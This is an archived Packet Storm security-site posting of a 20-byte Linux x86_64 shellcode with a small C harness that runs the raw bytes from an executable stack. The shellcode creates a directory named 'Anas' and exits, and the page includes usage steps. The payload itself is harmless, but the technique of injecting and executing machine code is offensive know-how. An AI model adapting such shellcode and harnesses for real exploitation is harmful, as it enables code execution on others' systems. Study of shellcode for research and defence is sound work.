Twenty Year Anniversary

Linux/x86_64 mkdir Shellcode

Linux/x86_64 mkdir Shellcode
Posted Jun 7, 2018
Authored by Anas Falhi

20 bytes small Linux/x86_64 mkdir shellcode.

tags | shellcode
systems | linux
MD5 | 98646e1891ce7c3b5ee989741a6e7909

Linux/x86_64 mkdir Shellcode

Change Mirror Download
Hi !

/*
# Exploit Title: Linux/x86_64 mkdir Shellcode [20 Bytes].
# Summary: Shortest mkdir Shellcode, It Creates A Folder With 755
Permissions Then Exit.
# Category: Shellcode.
# Architecture: Linux x86_64
# Shellcode Length: 20.
# Exploit Author: Anas Falhi,https://anasfalhi.blogspot.com.
# Tested on: Debian 4.14.17-1kali1 (2018-02-16) x86_64 GNU/Linux.

=========================== USAGE ===========================
#Compile
$ gcc filename.c -z execstack

#Run
$ ./a.out

#Check
$ ls -l
=============================================================

*/

#include<stdio.h>
#include<string.h>

unsigned char SH_C[] =
"\x04\x53\x68\x41\x6e\x61\x73\x54\x5f\x66\xbe\xef\x01\x0f\x05\x6a\x3c\x58\x0f\x05";

int main()
{

printf("Shellcode Len: %d\n", (int)strlen(SH_C));

int (*r)() = (int(*)())SH_C;

r();

}

Best Regards

Anas Falhi

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    8 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    32 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    2 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    7 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close